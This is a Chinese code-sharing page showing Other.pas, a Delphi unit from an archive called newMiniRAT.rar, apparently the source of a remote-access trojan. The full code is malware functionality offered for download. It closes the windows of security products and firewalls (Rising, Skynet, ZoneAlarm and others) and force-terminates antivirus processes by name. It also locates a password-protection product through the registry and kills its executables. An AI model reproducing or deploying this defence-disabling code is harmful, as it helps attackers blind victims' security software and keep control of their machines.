开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > Internet/网络编程 > 远程控制编程 > 查看源码
Other.pas
资源名称:newMiniRAT.rar [点击查看]
上传用户:sinothink
上传日期:2022-07-15
资源大小:459k
文件大小:3k
源码类别:

远程控制编程

开发平台:

Delphi

Other.pas:源码内容
  1. unit Other;
  3. interface
  5. uses
  6.   Windows,Reg, sysutils2,tlhelp32;
  8. procedure Killer;
  9. procedure Killpro(s: string);
  11. implementation
  13. procedure KillZhuanJia;
  14. var
  15.   found: boolean;
  16.   s,path:string;
  17.   i:integer;
  18.   h,FindHandle: THandle;
  19.   FindData: TWin32FindData;
  20. begin
  21.   path:=ReadValue(HKEY_LOCAL_MACHINE,'SOFTWAREMicrosoftWindowsCurrentVersionUninstall密码防盗专家 综合版','UninstallString');
  22.   if path='' then exit;
  23.   i:=pos(' ',path);
  24.   if i<>0 then delete(path,i,MaxInt);
  25.   path:=extractfilepath(Path);
  26.   FindHandle := FindFirstFile(PChar(path + '*.exe'), FindData);
  27.   s:='';
  28.   Found := FindHandle <> INVALID_HANDLE_VALUE;
  29.   while Found do begin //如果找到stg文件
  30. {    if (Ansicomparetext(FindData.cFileName,'PasswordGuard.exe')=0)or
  31.     (Ansicomparetext(FindData.cFileName,'UNWISE.EXE')=0)or
  32.     (Ansicomparetext(FindData.cFileName,'autoupdate.exe')=0)or
  33.     (Ansicomparetext(FindData.cFileName,'magic.exe')=0)then }
  34.     if ((FindData.cFileName[0]>='0')and(FindData.cFileName[0]<='9'))or
  35.        (Ansicomparetext(FindData.cFileName,'PasswordGuard.exe')=0) then
  36.     begin
  37.       h:=Integer(CreateFile(PChar(path+FindData.cFileName), GENERIC_WRITE,
  38.         0, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0));
  39.       if h= INVALID_HANDLE_VALUE then
  40.       begin
  41.         s:=uppercase(FindData.cFileName);
  42.         //Messagebox(0,pchar(s),'',0);
  43.         KillPro(s);
  44.         if (Ansicomparetext(FindData.cFileName,'PasswordGuard.exe')=0) then
  45.           KillPro(uppercase('PasswordGuard.e'));
  46.       end
  47.       else CloseHandle(h);
  48.     end;
  49.     Found := FindNextFile(FindHandle, FindData);
  50.   end;
  51.   Windows.FindClose(FindHandle);
  52. end;
  54. procedure Killer;
  55. var
  56.   s, Desktop: integer;
  57.   str: array[0..100] of char;
  58. begin
  59.   s := findwindow(pchar('RavMonClass'), pchar('RavMon.exe'));
  60.   Sendmessage(s, $0010, 0, 0);
  61.   s := findwindow('Tapplication', '天网防火墙个人版');
  62.   Sendmessage(s, $0010, 0, 0);
  63.   s := findwindow('Tapplication', '天网防火墙企业版');
  64.   Sendmessage(s, $0010, 0, 0);
  65. {  s := 0;
  66.   Desktop := GetDesktopWindow;
  67.   repeat
  68.     s := findwindowex(Desktop, s, 'TForm1', nil);
  69.     getwindowtext(s, str, 9);
  70.     if str = '木马克星' then //IPARMOR.EXE
  71.       sendmessage(s, $0010, 0, 0);
  72.   until s = 0; }
  73.   s := 0;
  74.   Desktop := GetDesktopWindow;
  75.   repeat
  76.     s := findwindowex(Desktop, s, 'TForm1', nil);
  77.     getwindowtext(s, str, 7);
  78.     if str = '噬菌体' then
  79.       sendmessage(s, $0010, 0, 0);
  80.   until s = 0;
  81.   s := findwindow(pchar('TfLockDownMain'), nil);
  82.   Sendmessage(s, $0010, 0, 0);
  83.   s := findwindow(pchar('ZAFrameWnd'), pchar('ZoneAlarm'));
  84.   Sendmessage(s, $0010, 0, 0);
  86.   Killpro('EGHOST.EXE');
  87.   Killpro('MAILMON.EXE');
  88.   Killpro('KAVPFW.EXE');
  89.   Killpro('IPARMOR.EXE');
  90.   KillZhuanJia;
  91. end;
  93. procedure Killpro(s: string);
  94. var
  95.   lppe: tprocessentry32;
  96.   sshandle: thandle;
  97.   hh: hwnd;
  98.   found: boolean;
  99. begin
  100.   sshandle := createtoolhelp32snapshot(TH32CS_SNAPALL, 0);
  101.   found := process32first(sshandle, lppe);
  102.   while found do
  103.   begin
  104.     if (ansicomparetext(extractfilename(lppe.szExeFile) , s)=0) or
  105.       (ansicomparetext(lppe.szExeFile, s)=0) then
  106.     begin
  107.       hh := OpenProcess(PROCESS_ALL_ACCESS, true, lppe.th32ProcessID);
  108.       TerminateProcess(hh, 0);
  109.     end;
  110.     found := process32next(sshandle, lppe);
  111.   end;
  112.   CloseHandle(sshandle);
  113. end;
  115. end.